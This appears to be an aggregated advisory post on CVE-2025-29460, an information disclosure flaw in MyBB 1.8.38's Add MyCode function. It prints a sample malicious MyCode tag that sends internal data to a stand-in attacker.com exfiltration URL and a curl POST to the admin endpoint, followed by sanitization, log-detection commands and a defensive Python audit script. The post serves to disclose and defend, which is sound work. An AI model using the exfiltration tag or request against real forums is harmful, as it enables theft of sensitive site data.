How CVE-2025-29460 Works
CVE-2025-29460 is an information disclosure vulnerability in MyBB 1.8.38 that allows a remote attacker to obtain sensitive data through the Add Mycode function. The flaw stems from insufficient validation of the submitted MyCode definition, so an attacker who can add MyCode can craft tags that pull internal system data into rendered output. The vendor disputes the severity, since adding MyCode requires admin privileges and MyBB ships SSRF mitigations, but a misconfigured deployment could still expose sensitive details. The CVSS 4.0 score rates the issue medium, reflecting unauthorized data access under specific conditions.
DailyCVE Form
Platform: MyBB
Version: 1.8.38
Vulnerability: Information Disclosure
Severity: Medium
Date: 04/25/2025
What Undercode Says:
Exploitation
1. Craft malicious Mycode:
[url=http://attacker.com/exfil?data={INTERNAL_DATA}]Click
2. Exploit via POST request:
curl -X POST -d "mycode=malicious_tag" http://target/mybb/admin/add_mycode.php
Protection
1. Input sanitization:
$mycode = htmlspecialchars($_POST['mycode'], ENT_QUOTES);
2. Patch verification:
diff -u /var/www/mybb/inc/plugins/mycode.php patched_file.php
Analytics
- Impacted systems: MyBB forums with custom Mycode enabled.
- Detection: Monitor logs for unusual Mycode additions:
grep "add_mycode" /var/log/mybb/admin.log
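The two defensive steps above (validating a MyCode definition before it is saved, and watching the admin log for MyCode additions) can be checked with a small audit script. The following is an added example written for this post; it is not MyBB's own code and not from the original advisory. The allowlist of hosts, the log line format, the field names and the sample entries are all constructed for illustration: MyBB keeps its admin log in the database rather than in /var/log, so adapt the parser to whatever export you produce.

```python
"""Audit custom MyCode definitions and admin-log lines for risky additions.

Added example, not MyBB's own code. Log format and allowlist are assumptions.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Assumed allowlist: hosts a MyCode replacement template may reference.
ALLOWED_HOSTS = {"forum.example.org", "cdn.example.org"}

# A URL inside a replacement template (stops at quotes, brackets and whitespace).
URL_RE = re.compile(r"https?://[^\s\"'<>\]]+", re.IGNORECASE)
# Capture groups ($1, $2) and template placeholders ({INTERNAL_DATA}) that expand
# at render time; inside a URL they carry data out to whatever host is named.
PLACEHOLDER_RE = re.compile(r"\$\d+|\{[A-Z_]+\}")
# Replacement text that would execute in the viewer's browser.
ACTIVE_RE = re.compile(r"<script|\bon\w+\s*=", re.IGNORECASE)


def audit_mycode_replacement(replacement: str) -> list[str]:
    """Return findings for one MyCode replacement template (empty list = clean).

    Intended to run server-side before a new MyCode definition is stored, in
    addition to the htmlspecialchars() escaping shown in the Protection section.
    """
    findings: list[str] = []
    for url in URL_RE.findall(replacement):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_HOSTS:
            findings.append(f"external host referenced: {host}")
            if PLACEHOLDER_RE.search(url):
                # Worst case: expanded data is sent to a non-allowlisted host.
                findings.append(f"placeholder embedded in external URL: {url}")
    if ACTIVE_RE.search(replacement):
        findings.append("active content in replacement")
    return findings


# Constructed admin-log export format (one event per line). Real MyBB admin
# actions are stored in the adminlog table; this mirrors a flat export of it.
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\S+) uid=(?P<uid>\d+) ip=(?P<ip>\S+) "
    r"module=(?P<module>\S+) action=(?P<action>\S+)"
    r'(?: title="(?P<title>[^"]*)")?'
)


def scan_admin_log(lines: list[str]) -> list[tuple[str, str, str, str]]:
    """Return (timestamp, uid, ip, title) for every MyCode addition in the log."""
    hits = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if m and m.group("action") == "add_mycode":
            hits.append((m.group("ts"), m.group("uid"), m.group("ip"), m.group("title") or ""))
    return hits


# Constructed sample log lines: two MyCode additions, one unrelated settings change.
SAMPLE_ADMIN_LOG = [
    '2025-04-25T10:01:12Z uid=1 ip=203.0.113.5 module=config-mycode action=add_mycode title="Spoiler"',
    "2025-04-25T10:04:55Z uid=1 ip=203.0.113.5 module=config-settings action=change",
    '2025-04-25T23:48:03Z uid=7 ip=198.51.100.9 module=config-mycode action=add_mycode title="Tracker"',
]

# Constructed replacement templates: one benign, one that ships data off-site.
BENIGN_TEMPLATE = '<a href="https://cdn.example.org/$1">$1</a>'
SUSPICIOUS_TEMPLATE = '<img src="https://collector.invalid/p?d={INTERNAL_DATA}">'


if __name__ == "__main__":
    for name, tpl in (("benign", BENIGN_TEMPLATE), ("suspicious", SUSPICIOUS_TEMPLATE)):
        print(name, audit_mycode_replacement(tpl) or "clean")
    for ts, uid, ip, title in scan_admin_log(SAMPLE_ADMIN_LOG):
        print(f"{ts} MyCode added by uid={uid} from {ip}: {title!r}")
```

Each MyCode addition reported by scan_admin_log should be reconciled with a change ticket; any addition whose replacement template trips audit_mycode_replacement warrants immediate review, because the data exposure the advisory describes only occurs once such a definition is saved and rendered.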
Mitigation Commands
1. Disable risky functions:
// Disable remote Mycode in config.php
$config['allow_remote_mycode'] = false;
2. Update MyBB:
wget https://mybb.com/download/latest -O mybb_update.zip
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29460
- MyBB Advisory: Check official patch notes for 1.8.39+ releases.
Sources:
Reported By: nvd.nist.gov